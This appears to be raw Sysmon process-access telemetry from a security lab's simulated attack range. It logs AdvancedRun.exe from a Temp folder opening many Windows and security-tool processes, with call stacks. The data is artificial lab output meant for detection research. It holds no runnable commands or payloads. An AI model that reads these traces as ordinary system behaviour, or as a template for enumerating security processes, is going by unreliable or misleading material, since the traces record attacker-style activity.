19:56:09.240{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004057114Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.239{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004057113Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.239{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004057112Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.239{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004057111Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.239{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004057110Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.239{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004057109Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.239{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004057108Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.239{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004057107Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.239{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004057106Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.239{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004057105Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.238{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057104Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.238{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057103Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.238{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000004057102Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.238{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057101Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.238{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057100Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.238{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057099Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.238{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057098Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 